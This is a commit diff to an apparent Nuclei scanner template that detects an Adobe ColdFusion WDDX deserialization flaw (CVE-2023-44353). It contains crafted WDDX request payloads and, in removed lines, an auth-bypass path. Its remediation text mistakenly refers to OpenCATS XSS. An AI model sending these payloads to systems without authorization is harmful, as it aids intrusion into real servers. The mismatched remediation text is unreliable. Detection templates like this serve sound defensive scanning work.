matcher & path update

projectdiscovery · Jan 6, 2024 · 5b9a2cd · 5b9a2cd
1 parent bc1a965
commit 5b9a2cd
Showing 1 changed file with 38 additions and 69 deletions.
diff --git a/http/cves/2023/CVE-2023-44353-with-CVE-2023-26347 b/http/cves/2023/CVE-2023-44353-with-CVE-2023-26347
@@ -1,113 +1,82 @@
 id: CVE-2023-44353
 
 info:
-  name: Adobe Coldfusion Auth Bypass + Remote Code Execution
+  name: Adobe ColdFusion WDDX Deserialization Gadgets
   author: salts
   severity: critical
   description: |
-     Adobe Coldfusion contains a persistent auth bypass issue previously tagged as CVE-2023-29298 and CVE-2023-38205, these ended up being difficult/impossible
-     to patch, because the fault was actually in the production IIS/Apache connector, where a hard coded rule was put in place. If an administrator ran the 
-     "lockdown" or production installer, this vulnerable path would be exposed to the internet. 
-     Recently, a remote deserialization / code execution flaw CVE-2023-44353 as published with public POC. This template chains the common auth bypass 
-     with the public POC looking for two common folders either C:\windows\ or /etc/.
-
-
+     Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
+  remediation: |
+    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
   reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
+    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
     - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
-    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html    
-  remediation: |
-    Update to the latest version of Confluence
-  classification:    
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 9.8
-    cve-id: CVE-2023-44353, CVE-2023-26347    
-  metadata:    
-  tags: cve,cve2023,adobe,coldfusion,auth-bypass,rce
+    cve-id: CVE-2023-44353
+    cwe-id: CWE-502
+    epss-score: 0.00227
+    epss-percentile: 0.60906
+    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: adobe
+    product: coldfusion
+    shodan-query: http.component:"Adobe ColdFusion"
+  tags: cve,cve2023,adobe,coldfusion
 
 variables:
-  version_path: "/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true"
+  version_path: "/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true"
   windows_known_path: "C:\\Windows\\"
   windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
   linux_known_path: "/etc/"  
   linux_bad_path: "/thesecretcowlevelisreal/"
+
 http:
   - raw:
-      - |
-        GET {{version_path}} HTTP/1.1
-        Host: {{Hostname}}    
-
-      #Windows checks here..
       - |
         POST {{version_path}} HTTP/1.1
         Host: {{Hostname}}   
         Content-Type: application/x-www-form-urlencoded
 
-        argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
+        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
 
       - |
         POST {{version_path}} HTTP/1.1
         Host: {{Hostname}}   
         Content-Type: application/x-www-form-urlencoded
 
-        argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
-      #Linux checks here..
+        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
+
       - |
         POST {{version_path}} HTTP/1.1
         Host: {{Hostname}}   
         Content-Type: application/x-www-form-urlencoded
-        
-        argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
+
+        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
 
       - |
         POST {{version_path}} HTTP/1.1
         Host: {{Hostname}}   
         Content-Type: application/x-www-form-urlencoded
-
-        argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
 
-
-    cookie-reuse: true
-    redirects: true
+        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
+
     matchers-condition: or
     matchers:
-      # First stage, I got a version via the auth bypass
       - type: dsl
-        name: CVE-2023-26347
+        name: windows
         dsl:                 
-          - status_code_1 == 200
-          - regex('wddxPacket', body_1)
-          - regex('\\d+,\\d+,\\d+,\\d+', body_1)          
-        condition: and  
-      # Second stage, I check for version success while sending filenames that should always exist on
-      # the platform
+          - "status_code_1 == 500 && status_code_2 == 404"
+          - contains(body_1, "coldfusion.runtime")
+        condition: and
 
-      # This checks for the vulnerability on windows by sending a check for C:\\Windows\\ and C:\\Thisdefinitelydoesnotexist
-      # If vulnerable, the different packets should return different results. Specifically the first should
-      # Return a 500, 404, or canned error message, where the second should return the expected version.
       - type: dsl
-        name: CVE-2023-44353
-        dsl:
-
-          - status_code_1 == 200
-          - regex('wddxPacket', body_1)
-          - regex('wddxPacket', body_3)          
-          # I get the version number back from body 1 and body 3, but not body 2
-          - regex('\\d+,\\d+,\\d+,\\d+', body_1)
-          - regex('\\d+,\\d+,\\d+,\\d+', body_3)
-          - "!regex('\\d+,\\d+,\\d+,\\d+', body_2)"          
-        condition: and 
-
-      # This checks for the vulnerability on Linux by sending a check for /etc and /thesecretcowlevelisreal/
-      # If vulnerable, the different packets should return different results. Specifically the first should
-      # Return a 500, 404, or canned error message, where the second should return the expected version.
-      - type: dsl
-        name: CVE-2023-44353
-        dsl:
-
-          - status_code_1 == 200
-          - regex('wddxPacket', body_1)
-          - regex('wddxPacket', body_5)          
-          # I get the version number back from body 1 and body 3, but not body 2
-          - regex('\\d+,\\d+,\\d+,\\d+', body_1)
-          - regex('\\d+,\\d+,\\d+,\\d+', body_5)
-          - "!regex('\\d+,\\d+,\\d+,\\d+', body_4)"          
-        condition: and 
+        name: linux
+        dsl:                 
+          - "status_code_3 == 500 && status_code_4 == 404"
+          - contains(body_3, "coldfusion.runtime")
+        condition: and